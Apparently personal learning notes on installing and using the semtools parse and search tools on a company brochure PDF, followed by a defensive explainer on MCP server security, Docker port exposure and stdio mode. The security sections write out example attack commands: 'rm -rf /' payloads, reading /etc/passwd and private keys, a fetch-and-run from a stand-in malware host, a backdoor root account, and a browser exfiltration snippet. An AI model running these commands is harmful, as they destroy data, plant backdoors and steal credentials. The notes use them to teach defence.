# Semtools and MCP Learning Summary
## Semtools Installation and Setup
### Installation Process
1. **Initial Challenge**: Required a Rust/Cargo version supporting Edition 2024 (Rust 1.85 or later)
- Original version: Cargo 1.68.2 (outdated)
- Solution: Updated to Cargo 1.89.0 via `rustup update`
2. **Installation Command**:
```bash
cargo install semtools
```
3. **Installed Executables**:
- `parse` - Document parsing tool (located at `~/.cargo/bin/parse`)
- `search` - Semantic search tool (located at `~/.cargo/bin/search`)
### Parse Tool Configuration
#### Configuration File Location
- Path: `~/.parse_config.json`
#### Required Configuration Structure
```json
{
"api_key": "your_llama_cloud_api_key_here",
"num_ongoing_requests": 10,
"base_url": "https://api.cloud.llamaindex.ai",
"check_interval": 5,
"max_timeout": 3600,
"max_retries": 10,
"retry_delay_ms": 1000,
"backoff_multiplier": 2.0,
"parse_kwargs": {
"parse_mode": "parse_page_with_agent",
"model": "openai-gpt-4-1-mini",
"high_res_ocr": "true",
"adaptive_long_table": "true",
"outlined_table_extraction": "true",
"output_tables_as_HTML": "true"
}
}
```
#### Key Configuration Learnings
- In this setup every field had to be present; omitting any of them caused `parse` to fail
- Requires LlamaParse API key from cloud.llamaindex.ai
- Parse output is saved to `~/.parse/[filename].md`
- Supports advanced PDF parsing with OCR and table extraction
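
Since a missing field was enough to break `parse` in this setup, a small pre-flight check can save a failed run. The following is a minimal sketch, assuming the required keys are exactly the top-level keys of the structure shown above; `missing_keys` and `check_config_file` are hypothetical helper names, not part of semtools.

```python
import json
from pathlib import Path
from typing import Optional

# Top-level keys copied from the configuration structure shown above.
REQUIRED_KEYS = {
    "api_key", "num_ongoing_requests", "base_url", "check_interval",
    "max_timeout", "max_retries", "retry_delay_ms", "backoff_multiplier",
    "parse_kwargs",
}


def missing_keys(config: dict) -> list:
    """Return the required top-level keys absent from config, sorted."""
    return sorted(REQUIRED_KEYS - set(config))


def check_config_file(path: Optional[Path] = None) -> list:
    """Load the JSON config (default: ~/.parse_config.json) and report missing keys."""
    path = path or Path.home() / ".parse_config.json"
    with path.open(encoding="utf-8") as fh:
        return missing_keys(json.load(fh))


# Example with an in-memory config that lacks two fields.
sample = {key: None for key in REQUIRED_KEYS - {"api_key", "max_retries"}}
print(missing_keys(sample))  # ['api_key', 'max_retries']
```

Calling `check_config_file()` with no argument reads the real config file, so it is left out of the example run above.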
### Using Semtools
#### Parse Command
```bash
# Basic usage
parse "filename.pdf"
# With verbose output
parse --verbose "filename.pdf"
# Help
parse --help
```
**Features**:
- Converts PDFs to markdown format
- Extracts tables as HTML
- Handles complex layouts with AI assistance
- Preserves document structure
#### Search Command
```bash
# Basic semantic search
search "query terms" "file.md"
# With context lines
search "query" "file.md" -n 5
# Top-k results
search "query" "file.md" --top-k 5
# Help
search --help
```
**Features**:
- Semantic search (finds contextually relevant content)
- Returns a distance score for each match (lower = closer match)
- Shows context around matches
- Supports multiple files/directories
### Practical Examples Performed
#### Example 1: Parsing the CompanyA PDF
**Command Used:**
```bash
parse "CompanyA - Intro H2 2024.pdf"
```
**Result:** Successfully parsed to `/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md`
**Sample Parsed Content:**
```markdown
# INTRODUCTION COMPANYA UK
## THE COMPANY AND PORTFOLIO AT A GLANCE
## COMPANYA | AT A GLANCE
> We specialise in creating software for a wide range of industries and technologies, actively playing a part in the digitisation of Europe.
> With a dedicated team of over **10,000 EMPLOYEES** (CompanyA Group | Feb. 2024) across Europe, we have recently broadened our scope to include the UK market, starting just one year ago.
## GROUP REVENUE 2023
- approx. **1.1 B. Euros**
## NUMEROUS AWARDS
| Year | Award / Recognition |
|-------|---------------------------------------------|
| 2023 | Data, Analytics & AI Market Leader |
| 2020 | [Award logo shown] |
```
#### Example 2: Semantic Search for Awards
**Command Used:**
```bash
search "awards achievements recognition excellence" "/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md"
```
**Results Found:**
```
/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:446::453 (0.4192522861034296)
## Awards shown on trophies
- Beste Arbeitgeber ITK
Great Place To Work 2020
/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:27::34 (0.639156086580848)
## NUMEROUS AWARDS
| Year | Award / Recognition |
|-------|---------------------------------------------|
| 2023 | Data, Analytics & AI Market Leader |
```
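
The result headers follow a regular shape, so they are easy to post-process. The sketch below assumes the header format is `<path>:<start>::<end> (<score>)`, which is inferred only from the sample output in this document; `Hit` and `parse_hits` are hypothetical names.

```python
import re
from typing import NamedTuple


class Hit(NamedTuple):
    path: str
    start: int
    end: int
    score: float


# Header shape inferred from the sample output: <path>:<start>::<end> (<score>)
HEADER = re.compile(r"^(?P<path>.+):(?P<start>\d+)::(?P<end>\d+) \((?P<score>[0-9.]+)\)$")


def parse_hits(output: str) -> list:
    """Extract result headers from search output, best (lowest) score first."""
    hits = []
    for line in output.splitlines():
        match = HEADER.match(line.strip())
        if match:
            hits.append(Hit(match["path"], int(match["start"]),
                            int(match["end"]), float(match["score"])))
    return sorted(hits, key=lambda hit: hit.score)


sample_output = """\
/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:27::34 (0.639156086580848)
## NUMEROUS AWARDS
/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:446::453 (0.4192522861034296)
## Awards shown on trophies
"""
for hit in parse_hits(sample_output):
    print(hit.start, hit.end, hit.score)
```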
#### Example 3: Financial Performance Search
**Command Used:**
```bash
search "1.1 billion euros revenue" "/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md" --top-k 5
```
**Results Found:**
```
/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:21::28 (0.5080750291633499)
## GROUP REVENUE 2023
- approx. **1.1 B. Euros**
/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:10::17 (0.7265656264502557)
> With a dedicated team of over **10,000 EMPLOYEES** (CompanyA Group | Feb. 2024) across Europe, we have recently broadened our scope to include the UK market, starting just one year ago.
```
#### Example 4: Company Positioning Search
**Command Used:**
```bash
search "speed boat agility flexibility enterprise scalability" "/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md" -n 5
```
**Key Result Found:**
```
/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:183::194 (0.4164071779051679)
> CompanyA combines the professionalism and scalability of a large IT company with the agility and flexibility of a small IT service provider and thus offers you ...
> * ...a pronounced **service provider mentality**!
> * ...solution-oriented services with optimal **benefits**!
> * ...pragmatic, **fast solutions** and hands-on mentality!
> * ...a very high service quality designed for **speed**!
> * ...extraordinary **flexibility** in cooperation!
> * ...fast and variable **scalability** in the services - both OnShore and with CompanyA SmartShore!
**WE JUST DO IT!**
```
### Key Discoveries from Parsed Content
**Company Overview:**
- Founded 1997 in Germany, became CompanyA SE in 2019
- Over 10,000 employees across Europe
- €1.1 billion revenue (2023)
- 64 locations in Europe & UK
**Major Clients Found:**
```
COMMERZBANK, DEUTSCHE BUNDESBANK, Bayern LB, Munich RE, MAN, DAIMLER,
vodafone, T-Mobile, SwissLife, ZURICH, AOK, BARMER, Union Investment
```
**Industry Services Table Extracted:**
```
| Automotive | Banking | Health | Insurance | Life Sciences | Manufacturing Industry | Public | Retail | Utilities |
```
**Unique Value Proposition Discovered:**
The company positions itself as combining "Speed Boat" agility with "Big Player" enterprise capabilities - offering both the flexibility of a small service provider and the scalability of a large corporation.
## MCP (Model Context Protocol) Security Insights
### Why Terminal Access MCP is Unsafe
1. **Unrestricted Command Execution**
- Can execute ANY system command
- Same privileges as running user
- Direct file system access
2. **No Sandboxing**
- Runs directly on host system
- No container/VM isolation
- Can affect other processes
3. **Security Risks**
- Privilege escalation potential
- Remote code execution vector
- Data exfiltration capabilities
- Lack of audit trails
### Safer MCP Usage Patterns
#### 1. Read-Only Operations
```json
{
"tools": [
{"name": "read_file", "permissions": "read-only"},
{"name": "list_directory", "permissions": "read-only"}
]
}
```
#### 2. Containerization
```bash
docker run --read-only \
--security-opt=no-new-privileges \
--cap-drop=ALL \
--user=nobody \
mcp-server
```
#### 3. Whitelisted Commands
```json
{
"allowed_commands": [
"git status",
"npm list",
"python --version"
],
"blocked_patterns": [
"rm -rf",
"sudo",
"curl | bash"
]
}
```
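
One way to enforce such a list is to compare the parsed argument vector against exact entries and deny everything else. This is a minimal sketch under that assumption; `ALLOWED_COMMANDS` and `is_allowed` are hypothetical names, and the policy format above is not something MCP itself defines.

```python
import shlex

# Exact argument vectors taken from the allowed_commands list above.
ALLOWED_COMMANDS = {
    ("git", "status"),
    ("npm", "list"),
    ("python", "--version"),
}


def is_allowed(command_line: str) -> bool:
    """Default deny: permit only exact argv matches from the allowlist."""
    try:
        argv = tuple(shlex.split(command_line))
    except ValueError:  # unbalanced quotes and similar parse errors
        return False
    return argv in ALLOWED_COMMANDS


print(is_allowed("git status"))             # True
print(is_allowed("git status; rm -rf /"))   # False
```

With this design no `blocked_patterns` list is needed, because anything that is not an exact match is rejected. An allowed command should then be run from its argument list without a shell, so that characters such as `;` or `|` are never interpreted.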
#### 4. Use Stdio Mode (Recommended)
```bash
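# Safer - uses stdio pipes (`server-name` is a placeholder package name)
npx @modelcontextprotocol/server-name
# Riskier - exposes a network port (`--port` is illustrative; the actual option depends on the server)
npx @modelcontextprotocol/server-name --port 3000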
```
### Best Practices for MCP
1. **Default Deny Policy**: Block everything by default, explicitly allow needed operations
2. **Principle of Least Privilege**: Run with minimal necessary permissions
3. **Comprehensive Logging**: Audit all operations
4. **Use Trusted Servers**: Stick to official/verified MCP implementations
5. **Rate Limiting**: Prevent abuse through request limits
6. **Approval Workflows**: Require confirmation for sensitive operations
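### Safe MCP Configuration Example
The `permissions` and `sandboxed` keys below illustrate the intended policy; they are not settings that MCP clients are known to enforce, so check what your client and server actually support. The filesystem server itself limits access to the directories passed in `args`.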
```json
{
"mcp_servers": {
"filesystem": {
"command": "npx",
"args": ["@modelcontextprotocol/server-filesystem", "/safe/directory"],
"permissions": {
"read": true,
"write": false,
"execute": false
}
},
"memory": {
"command": "npx",
"args": ["@modelcontextprotocol/server-memory"],
"sandboxed": true
}
}
}
```
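
Restricting a server to `/safe/directory` only helps if requested paths cannot escape it. The following sketch shows one common way to check that, assuming paths are resolved before comparison; `is_inside` is a hypothetical helper and not how any particular MCP server implements it.

```python
from pathlib import Path


def is_inside(root: str, requested: str) -> bool:
    """True when requested, resolved against root, stays within root."""
    base = Path(root).resolve()
    # Joining an absolute path replaces the base, so "/etc/passwd" is caught too.
    target = (base / requested).resolve()
    return target == base or base in target.parents


print(is_inside("/safe/directory", "notes/todo.md"))      # True
print(is_inside("/safe/directory", "../../etc/passwd"))   # False
```

Resolving first collapses `..` segments and follows existing symlinks, so a link inside the directory that points elsewhere is rejected as well.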
### Why Exposing Port 3000 (or Any Port) is Risky
#### 1. **Network Attack Surface**
When you expose a port like 3000:
```bash
# RISKY - Creates network listener
npx @modelcontextprotocol/server-name --port 3000
```
This opens port 3000 to network connections, meaning:
- Any process on your machine can connect
- If firewall is misconfigured, external attackers could connect
- Creates a persistent network service that can be discovered
- Enables port scanning and service enumeration
#### 2. **Localhost Still Has Risks**
Even binding to `127.0.0.1:3000` isn't completely safe:
- Other local processes can connect (including malware)
- Browser-based attacks via JavaScript `fetch()` or XHR
- Port scanning by local malicious software
- Shared systems allow other users to connect
- No built-in authentication on most MCP servers
#### 3. **Common Misconfiguration Dangers**
```bash
# VERY DANGEROUS - Binds to all interfaces
npx server --port 3000 --host 0.0.0.0
# Docker mistake - publishes the port on all host interfaces by default
docker run -p 3000:3000 mcp-server # Reachable from any network that can route to the host
```
#### 4. **Missing Security Controls**
Network-exposed MCP servers typically lack:
- Authentication mechanisms
- Rate limiting
- Request validation
- Access controls
- Encryption (HTTP vs HTTPS)
#### 5. **Protocol Vulnerabilities**
HTTP/TCP protocols over network can suffer from:
- Man-in-the-middle attacks
- Request injection
- Buffer overflow exploits
- Protocol confusion attacks
- Session hijacking
#### 6. **Real-World Attack Scenarios**
**Scenario 1: Malware Exploitation**
```bash
# Malware discovers open port 3000
curl http://127.0.0.1:3000/execute -d '{"command": "rm -rf /"}'
```
**Scenario 2: Browser-Based Attack**
```javascript
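// Malicious website targets a local MCP server.
// Without permissive CORS headers the page cannot read the response,
// but the request itself still reaches the server (sendToAttacker is a placeholder).
fetch('http://127.0.0.1:3000/api/files')
.then(response => response.text())
.then(data => sendToAttacker(data))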
```
**Scenario 3: Docker Misconfiguration**
```dockerfile
# EXPOSE only documents the port; it does not publish it on the host
EXPOSE 3000
# DANGEROUS - running with -p 3000:3000 publishes it on all host interfaces
```
#### Why Stdio Mode is Safer
```bash
# SAFE - Uses stdio pipes, no network
npx @modelcontextprotocol/server-name
```
**Stdio advantages:**
- **No network exposure** - only parent process can communicate
- **Process isolation** - communication through pipes only
- **Automatic cleanup** - the server sees EOF on stdin when the parent exits and normally shuts down
- **OS-level security** - leverages process permissions
- **No port scanning** - invisible to network tools
- **No remote access** - there is no listening socket for a remote client to connect to
#### Network Security Best Practices (If Ports Are Required)
1. **Bind to Localhost Only**
```bash
npx server --port 3000 --host 127.0.0.1
```
2. **Use Unix Domain Sockets Instead**
```bash
# Better than TCP ports
npx server --socket /tmp/mcp.sock
chmod 600 /tmp/mcp.sock # Restrict permissions
```
3. **Add Authentication Layer**
```json
{
"auth": {
"type": "bearer",
"token": "secure-random-token"
}
}
```
4. **Implement Rate Limiting**
```json
{
"rate_limit": {
"requests_per_minute": 60,
"max_connections": 5
}
}
```
5. **Use TLS/SSL for Encryption**
```bash
# Use HTTPS instead of HTTP
npx server --port 3000 --cert server.crt --key server.key
```
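
The authentication and rate-limiting settings above are declarative; something still has to enforce them. The sketch below shows one possible enforcement point, assuming a single shared bearer token and a sliding 60-second window. `RequestGate` is a hypothetical class, and the `clock` parameter exists only to make the behaviour testable.

```python
import hmac
import time
from collections import deque


class RequestGate:
    """Accept a request only if the token matches and the rate limit allows it."""

    def __init__(self, token: str, requests_per_minute: int = 60, clock=time.monotonic):
        self._token = token.encode()
        self._limit = requests_per_minute
        self._clock = clock
        self._recent = deque()  # timestamps of requests accepted in the last 60 s

    def allow(self, presented_token: str) -> bool:
        # Constant-time comparison avoids leaking the token through timing.
        if not hmac.compare_digest(presented_token.encode(), self._token):
            return False
        now = self._clock()
        while self._recent and now - self._recent[0] >= 60:
            self._recent.popleft()
        if len(self._recent) >= self._limit:
            return False
        self._recent.append(now)
        return True


gate = RequestGate("secure-random-token", requests_per_minute=60)
print(gate.allow("wrong-token"))          # False
print(gate.allow("secure-random-token"))  # True
```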
#### Architecture Comparison
**Network Mode (Risky):**
```
Claude Code → Network Stack → Port 3000 → MCP Server
↑ ↑
Attacker Port Scanner
```
**Stdio Mode (Safe):**
```
Claude Code ←→ Stdio Pipes ←→ MCP Server
(Process Isolation)
```
#### Key Principle
**Avoid network protocols when local IPC (Inter-Process Communication) suffices.** Network exposure should only be used when absolutely necessary and with proper security controls.
### Deep Dive: Why `docker run -p 3000:3000` Exposes to Internet
This behaviour catches many developers off guard. The sections below break down why this seemingly innocent command can expose a service to the internet:
#### How Docker's `-p` Flag Works
The `-p` (or `--publish`) flag creates port mapping from host to container:
```bash
# -p [host_port]:[container_port]
#   host_port      = port on your host machine (YOUR COMPUTER)
#   container_port = port inside the container
-p 3000:3000
```
#### The Critical Detail: Default Binding Behavior
**By default, `-p 3000:3000` binds to `0.0.0.0:3000` on your host**, which means:
```bash
# What you type:
docker run -p 3000:3000 mcp-server
# What Docker actually does (0.0.0.0 = ALL network interfaces):
docker run -p 0.0.0.0:3000:3000 mcp-server
```
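
The default can be made explicit with a few lines of parsing. This sketch handles only the two forms used in this document (`host_port:container_port` and `ip:host_port:container_port`); Docker accepts more variants, and on hosts with IPv6 it typically binds the IPv6 wildcard as well, which is ignored here. `parse_publish` is a hypothetical helper.

```python
def parse_publish(spec: str) -> tuple:
    """Return (host_ip, host_port, container_port) for a -p value."""
    parts = spec.split(":")
    if len(parts) == 2:
        # No address given: the port is published on all interfaces.
        host_ip = "0.0.0.0"
        host_port, container_port = parts
    elif len(parts) == 3:
        host_ip, host_port, container_port = parts
    else:
        raise ValueError(f"unsupported publish spec: {spec!r}")
    return host_ip, int(host_port), int(container_port)


print(parse_publish("3000:3000"))            # ('0.0.0.0', 3000, 3000)
print(parse_publish("127.0.0.1:3000:3000"))  # ('127.0.0.1', 3000, 3000)
```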
#### What `0.0.0.0` Actually Means
- `0.0.0.0` = "bind to all available network interfaces"
- This includes:
- `127.0.0.1` (localhost/loopback)
- Your WiFi IP (e.g., `192.168.1.100`)
- Your Ethernet IP
- **Your public IP address if directly connected**
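
The difference between the two bind addresses is visible directly at the socket level. The following sketch opens one listener on loopback and one on the wildcard address, using port 0 so the operating system picks free ports; `listen_on` is a hypothetical helper name.

```python
import socket


def listen_on(host: str) -> socket.socket:
    """Open a TCP listener on host with an OS-chosen free port."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind((host, 0))  # port 0 asks the OS for any free port
    sock.listen(1)
    return sock


with listen_on("127.0.0.1") as loopback_only, listen_on("0.0.0.0") as all_interfaces:
    # Only local clients can reach the first socket; the second accepts
    # connections arriving on any interface of the machine.
    print(loopback_only.getsockname()[0])   # 127.0.0.1
    print(all_interfaces.getsockname()[0])  # 0.0.0.0
```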
#### Internet Exposure Scenarios
**1. Cloud/VPS Servers**
```bash
# Running on AWS, Azure, DigitalOcean, etc.
docker run -p 3000:3000 mcp-server
# Now accessible at: http://your-server-public-ip:3000
# Anyone on the internet can connect unless a security group or firewall blocks the port!
```
**2. Home Networks with Port Forwarding**
```bash
# Your router forwards port 3000, or has DMZ enabled
# Your service becomes accessible from outside your network
```
**3. Corporate Networks**
```bash
# Many corporate networks have direct routing
# Port 3000 becomes accessible to entire corporate network
# Could violate security policies
```
#### Real Attack Scenario
```bash
# You innocently run:
docker run -p 3000:3000 mcp-server
# Attacker from anywhere can now:
curl http://your-public-ip:3000/execute \
-d '{"command": "cat /etc/passwd"}'
curl http://your-public-ip:3000/files \
-d '{"action": "list", "path": "/"}'
```
#### How to Run Docker Safely
**Option 1: Explicit Localhost Binding (Recommended)**
```bash
# SAFE - Only accessible from your machine (explicitly bound to localhost)
docker run -p 127.0.0.1:3000:3000 mcp-server
```
**Option 2: Use Docker Networks (Most Secure)**
```bash
# SAFE - Internal Docker network only, no external ports
docker network create mcp-network
docker run --network mcp-network --name mcp-server mcp-server
docker run --network mcp-network my-app
# Containers can talk to each other, but no external access
```
**Option 3: Unix Domain Sockets**
```bash
# SAFE - Filesystem-based communication
docker run -v /tmp:/tmp mcp-server --socket /tmp/mcp.sock
# No network exposure at all
```
#### How to Check If You're Currently Exposed
```bash
# Check what's listening on port 3000
netstat -an | grep 3000
# OR
ss -tulpn | grep 3000
# If you see this, you're EXPOSED (listening on all interfaces):
#   tcp 0.0.0.0:3000 *:* LISTEN
# If you see this, the listener is localhost only:
#   tcp 127.0.0.1:3000 *:* LISTEN
```
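
The same judgement can be automated when auditing many listeners. This is a minimal sketch that classifies the local-address column of `ss` or `netstat` output, assuming the `host:port` and `[ipv6]:port` spellings; `exposure` is a hypothetical helper.

```python
import ipaddress


def exposure(local_address: str) -> str:
    """Classify a listen address as loopback, all interfaces, or a specific interface."""
    host, _, _port = local_address.rpartition(":")
    host = host.strip("[]")  # ss prints IPv6 addresses as [::]:3000
    if host in ("*", ""):
        return "all interfaces"
    ip = ipaddress.ip_address(host)
    if ip.is_unspecified:  # 0.0.0.0 or ::
        return "all interfaces"
    if ip.is_loopback:     # 127.0.0.0/8 or ::1
        return "loopback"
    return "specific interface"


for address in ("0.0.0.0:3000", "127.0.0.1:3000", "[::]:3000", "192.168.1.100:3000"):
    print(address, "->", exposure(address))
```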
#### Scan for Exposed Services
```bash
# Check from external perspective
nmap your-public-ip
# If port 3000 shows up, you're exposed!
# Check Docker port mappings
docker port container-name
# Shows all port mappings for container
```
#### Common Dangerous Misunderstandings
1. **"It's just Docker, it's contained"**
- Container isolation does not cover ports you choose to publish
- The `-p` flag deliberately opens a path through the container's network isolation
2. **"I'm behind NAT/firewall"**
- NAT isn't a security boundary
- Many routers have UPnP that auto-opens ports
- Docker can modify firewall rules automatically
3. **"It's just for development/testing"**
- Attackers continuously scan for development services
- Test servers often have weaker security
- "Temporary" often becomes permanent
4. **"My cloud provider protects me"**
- Most cloud instances have public IPs
- Security groups/firewalls must be explicitly configured
- Default configurations often allow wide access
#### Docker Security Best Practices
**1. Never Use Default Port Binding in Production**
```bash
# NEVER do this in production:
docker run -p 3000:3000 app
# Always specify bind address:
docker run -p 127.0.0.1:3000:3000 app
```
**2. Use Docker Networks for Inter-Container Communication**
```bash
# Create isolated network
docker network create --driver bridge app-network
# Run containers on network
docker run --network app-network api-server
docker run --network app-network database
# No external ports needed!
```
**3. Implement Reverse Proxy Pattern**
```bash
# Only expose reverse proxy (nginx, traefik)
docker run -p 127.0.0.1:80:80 nginx
docker run --network internal-network app1
docker run --network internal-network app2
# Apps not directly accessible from outside
```
**4. Use Environment-Specific Configurations**
```yaml
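# docker-compose.yml
version: '3'
services:
  mcp-server:
    # Development: publish on the loopback interface only
    ports:
      - "127.0.0.1:3000:3000" # Safe local binding
    # Production: remove `ports` and rely on the internal network
    networks:
      - internal # No external ports
networks:
  internal:
    internal: true # Containers on this network get no external connectivity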
```
#### Firewall Interaction Warning
Docker manipulates iptables rules automatically:
```bash
# Docker adds rules that can bypass your firewall!
# Check what Docker added:
iptables -L DOCKER
# Docker rules often come BEFORE your custom rules
# Your firewall config might be ignored!
```
#### The Bottom Line
**`docker run -p 3000:3000` publishes the port on every network interface of the host.** Docker accepts connections from any network that can route to the machine and forwards them to your container; on a cloud server with a public IP and an open security group, that means the whole internet. Unless you explicitly specify `127.0.0.1`, Docker assumes you want the port reachable on all interfaces.
This is why:
- Stdio mode is preferred for MCP servers (no network at all)
- If ports are needed, always bind to `127.0.0.1:port`
- Never omit the bind address in production
- Use Docker networks for internal communication
- Regularly audit your exposed ports with `netstat` or `nmap`
**Remember: Convenience is the enemy of security. Always be explicit about network exposure.**
### Understanding Attack Commands: The `-d` Flag in curl
Many of the attack examples in this document use curl with the `-d` flag. Understanding what this flag does is crucial for comprehending the security risks:
#### What the `-d` Flag Does
The `-d` flag in curl stands for "**data**" and is used to send HTTP POST data in the request body:
```bash
# First argument: target URL; -d argument: POST data (JSON payload)
curl http://127.0.0.1:3000/execute -d '{"command": "rm -rf /"}'
```
#### Technical Breakdown
1. **HTTP Method**: `-d` automatically changes the request from GET to POST
2. **Content-Type**: Sets `Content-Type: application/x-www-form-urlencoded` by default
3. **Request Body**: Places the data in the HTTP request body
4. **JSON Data**: The string becomes the POST payload sent to the server
#### The HTTP Request Generated
```http
POST /execute HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

{"command": "rm -rf /"}
```
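
The method and the `Content-Length` value can be checked without sending anything. The sketch below builds the same request with Python's standard library purely for inspection; it never calls `urlopen()`, so no traffic is generated.

```python
import urllib.request

body = b'{"command": "rm -rf /"}'

# Constructing the Request object does not open a connection.
request = urllib.request.Request(
    "http://127.0.0.1:3000/execute",
    data=body,
    headers={"Content-Type": "application/x-www-form-urlencoded"},
)

print(request.get_method())  # POST, because a body is attached
print(len(body))             # 23, the value of the Content-Length header
```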
#### What `rm -rf /` Actually Does
This is one of the most destructive commands possible on Unix/Linux systems:
- `rm` = remove/delete command
- `-r` = recursive (delete directories and all their contents)
- `-f` = force (don't prompt for confirmation, ignore nonexistent files)
- `/` = root directory (the entire filesystem)
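**Translation**: "Delete everything on the system without asking for confirmation". GNU `rm` refuses to operate on `/` unless `--no-preserve-root` is given, but close variants such as `rm -rf /*` or `rm -rf ~` are not stopped by that safeguard.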
#### Real-World Impact of This Attack
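If an MCP server running with root privileges executes a command like this, the results are catastrophic (a non-root server still destroys everything its user can write to):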
- **Operating System**: Completely destroyed
- **All Applications**: Deleted permanently
- **User Data**: Gone forever (documents, databases, configurations)
- **System Recovery**: Impossible without complete restoration from backups
- **Server Status**: Completely bricked and unusable
- **Business Impact**: Complete system downtime, potential data loss
#### Other Dangerous Commands via `-d`
```bash
# Exfiltrate sensitive data
curl -d '{"command": "cat /etc/passwd"}' http://127.0.0.1:3000/execute
# Download and execute malware
curl -d '{"command": "curl malicious-site.com/malware.sh | bash"}' url
# Create backdoor access
curl -d '{"command": "echo \"hacker::0:0::/root:/bin/bash\" >> /etc/passwd"}' url
# Steal environment variables (often contain secrets)
curl -d '{"command": "env"}' http://127.0.0.1:3000/execute
# Access private keys
curl -d '{"command": "find /home -name \"*.key\" -o -name \"id_rsa\""}' url
```
#### Other curl `-d` Flag Variations
```bash
# Send JSON with proper content-type
curl -d '{"key": "value"}' -H "Content-Type: application/json" url
# Send form data
curl -d "username=admin&password=secret" url
# Send from file
curl -d @malicious-payload.json url
# Multiple data parameters
curl -d "field1=value1" -d "field2=value2" url
# URL encode data
curl -d "message=hello%20world" url
```
#### Why These Examples Are So Effective
1. **No Authentication**: Many development MCP servers have no authentication
2. **Full Privileges**: MCP servers often run with the same privileges as the user
3. **Direct Execution**: Commands execute immediately without validation
4. **No Logging**: Many servers don't log incoming commands
5. **Network Accessible**: `-p 3000:3000` makes them reachable from any network that can route to the host
#### The Security Lesson
The `-d` flag itself is completely innocent - it's just a way to send data with HTTP POST requests. The danger comes from:
1. **Unsecured Endpoints**: Servers that execute any command without validation
2. **Network Exposure**: Making these endpoints accessible over the network
3. **Lack of Input Validation**: Not sanitizing or restricting incoming commands
4. **Missing Authentication**: No verification of who is sending commands
5. **Excessive Privileges**: Running servers with unnecessary system access
#### Defense Against These Attacks
**1. Never Expose Command Execution Endpoints**
```bash
# DON'T create endpoints like:
/execute
/command
/run
/shell
```
**2. Use Whitelisted Operations Instead**
```json
{
"allowed_operations": [
"get_status",
"list_files",
"read_config"
],
"blocked_operations": ["execute", "command", "shell"]
}
```
**3. Input Validation and Sanitization**
```javascript
// Validate incoming data
if (data.command.includes('rm -rf')) {
throw new Error('Destructive command blocked');
}
// Use command whitelists
const allowedCommands = ['git status', 'npm version'];
if (!allowedCommands.includes(data.command)) {
throw new Error('Command not allowed');
}
```
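
The two checks above are not equally strong. The following sketch mirrors both in Python and runs them against a few spellings of the same destructive command; the variants are hypothetical inputs chosen to show how a substring blocklist is bypassed while the exact-match allowlist holds.

```python
def blocklist_allows(command: str) -> bool:
    """Mirror of the substring check: reject only a verbatim 'rm -rf'."""
    return "rm -rf" not in command


ALLOWED_COMMANDS = {"git status", "npm version"}


def allowlist_allows(command: str) -> bool:
    """Mirror of the exact-match allowlist."""
    return command in ALLOWED_COMMANDS


# Hypothetical spellings of the same destructive command.
variants = ["rm -rf /tmp/x", "rm  -rf /tmp/x", "rm -r -f /tmp/x", "rm -fr /tmp/x"]
for variant in variants:
    print(f"{variant!r}: blocklist allows={blocklist_allows(variant)}, "
          f"allowlist allows={allowlist_allows(variant)}")
```

Only the first variant is caught by the blocklist, while the allowlist rejects all four. This is why the allowlist should be the primary control and pattern blocking at most a secondary one.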
**4. Run with Minimal Privileges**
```bash
# Create restricted user
useradd --no-create-home --shell /bin/false mcp-user
# Run server as restricted user
sudo -u mcp-user node mcp-server.js
```
**5. Use Stdio Mode (Eliminates Network Attacks)**
```bash
# SAFE - No network exposure possible
npx @modelcontextprotocol/server-name
# DANGEROUS - Network exposed
npx @modelcontextprotocol/server-name --port 3000
```
#### Key Takeaway
**The `-d` flag is just the delivery mechanism. The real danger is having network-accessible endpoints that execute arbitrary commands without proper security controls.** This is why stdio mode is strongly recommended for MCP servers - it eliminates the entire network attack surface.
## STDIO Mode vs Network Protocols: OSI Model Deep Dive
Understanding why STDIO mode is fundamentally safer requires understanding the difference between **Inter-Process Communication (IPC)** and **network protocols** in the context of the OSI model.
### STDIO Mode Explained
**STDIO (Standard Input/Output) mode** uses operating system pipes for communication instead of network sockets:
```bash
# STDIO Mode (SAFE) - Uses OS pipes
npx @modelcontextprotocol/server-name
# Network Mode (RISKY) - Uses TCP/IP sockets
npx @modelcontextprotocol/server-name --port 3000
```
### OSI Model Attack Surface Comparison
#### Network Mode - Full OSI Stack Exposure
Network-based MCP servers traverse the complete OSI stack, creating attack surfaces at every layer:
```
┌─────────────────────────────────────────┐
│ Layer 7: Application (HTTP, MCP Protocol) │ ← Command injection attacks
├─────────────────────────────────────────┤
│ Layer 6: Presentation (JSON encoding) │ ← Data manipulation attacks
├─────────────────────────────────────────┤
│ Layer 5: Session (HTTP sessions) │ ← Session hijacking
├─────────────────────────────────────────┤
│ Layer 4: Transport (TCP) │ ← Port scanning, DoS attacks
├─────────────────────────────────────────┤
│ Layer 3: Network (IP routing) │ ← IP spoofing, routing attacks
├─────────────────────────────────────────┤
│ Layer 2: Data Link (Ethernet) │ ← ARP poisoning, MAC spoofing
├─────────────────────────────────────────┤
│ Layer 1: Physical (Network interface) │ ← Physical network access
└─────────────────────────────────────────┘
```
#### STDIO Mode - Zero Network Stack Involvement
STDIO mode completely bypasses the network stack, operating at the OS process level:
```
┌─────────────────────────────────────────┐
│ Application Layer (MCP Protocol) │ ← Only accessible to parent process
├─────────────────────────────────────────┤
│ Operating System IPC (Pipes) │ ← Protected by process isolation
├─────────────────────────────────────────┤
│ Kernel System Calls │ ← OS enforces access controls
├─────────────────────────────────────────┤
│ Process Management │ ← Cannot be accessed remotely
└─────────────────────────────────────────┘
```
### Communication Flow Comparison
#### Network Mode Communication Path
```bash
# Network mode creates this communication path:
Claude Code ──→ TCP Socket ──→ Network Stack ──→ Port 3000 ──→ MCP Server
│ │ │ │ │
Layer 7 Layer 4 Layers 3-1 Layers 4-7 Layer 7
# Attack vector exists:
Attacker ──→ Internet ──→ Your Network ──→ Port 3000 ──→ MCP Server
```
